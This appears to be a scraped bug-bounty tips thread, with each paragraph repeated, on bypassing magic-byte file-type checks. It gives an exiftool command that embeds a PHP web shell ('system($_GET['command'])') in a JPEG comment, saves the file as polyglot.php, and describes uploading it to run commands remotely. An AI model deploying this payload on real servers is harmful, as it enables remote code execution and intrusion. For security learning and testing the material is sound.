When you know that a server is attempting to validate an image's intrinsic attributes and prevent Content-Type/Extension bypasses, you can upload a polygot file to get RCE.
But what's all this? How do I do this?
Learn more below.
๐งต๐
#bugbounty #bugbountytips #infosec
But what's all this? How do I do this?
Learn more below.
๐งต๐
#bugbounty #bugbountytips #infosec
๐ต Understanding how applications can determine file type
There are many ways through which an application can determine the file type. This detection could be based on extension type, magic bytes detection or more sophisticated detection using file headers.
There are many ways through which an application can determine the file type. This detection could be based on extension type, magic bytes detection or more sophisticated detection using file headers.
1. Extension type detection
The easiest of all ways to detect a file type is using the file's extension. Example: dogs.jpg is a JPG file.
I have already written a thread to perform extension bypasses and upload a web shell. Check it out here:
The easiest of all ways to detect a file type is using the file's extension. Example: dogs.jpg is a JPG file.
I have already written a thread to perform extension bypasses and upload a web shell. Check it out here:
2. Magic bytes detection
Certain file types may always contain a specific sequence of bytes (aka Magic Bytes) in their header or footer.
For example, JPEG files begin with FF D8 and PDF files start with 25 50 44 46(hex)
Certain file types may always contain a specific sequence of bytes (aka Magic Bytes) in their header or footer.
For example, JPEG files begin with FF D8 and PDF files start with 25 50 44 46(hex)
๐ต The Catch
Although the magic bytes detection is an advanced way of file type detection, it is still exploitable.
We create a polyglot JPEG file containing malicious code within its metadata and upload it to get a RCE.
Although the magic bytes detection is an advanced way of file type detection, it is still exploitable.
We create a polyglot JPEG file containing malicious code within its metadata and upload it to get a RCE.
๐ต How do I do it?
1. Download exiftool and a random image. Let's call it image.jpg
2. Create a polygot file using the below command
exiftool -Comment="<?php echo system($_GET['command']); ?>
" image.jpg -o polyglot.php
3. Upload polygot.php to the server
1. Download exiftool and a random image. Let's call it image.jpg
2. Create a polygot file using the below command
exiftool -Comment="<?php echo system($_GET['command']); ?>
" image.jpg -o polyglot.php
3. Upload polygot.php to the server
๐ข Checking the file metadata
As you can see here, we have inserted the payload in the "Comment" part of our file and despite having a .php in the name, we can ensure that the file type is JPEG and the MIME Type is image/jpeg.
As you can see here, we have inserted the payload in the "Comment" part of our file and despite having a .php in the name, we can ensure that the file type is JPEG and the MIME Type is image/jpeg.
๐ต Exploit
Once you upload this, you can check the GET request in your proxy which fetches this request from the server. This would ideally execute whatever command you give in the 'command' field of the payload.
Once you upload this, you can check the GET request in your proxy which fetches this request from the server. This would ideally execute whatever command you give in the 'command' field of the payload.
โญ Reference
To learn more about Polygots, I would definitely recommend checking out @vickieli7 's blog post below.
Link: medium.com
To learn more about Polygots, I would definitely recommend checking out @vickieli7 's blog post below.
Link: medium.com
@vickieli7 That's a wrap!
If you enjoyed this thread:
1. Follow me @thebinarybot for more of these
2. RT the tweet below to share this thread with your audience
If you enjoyed this thread:
1. Follow me @thebinarybot for more of these
2. RT the tweet below to share this thread with your audience
Loading suggestions...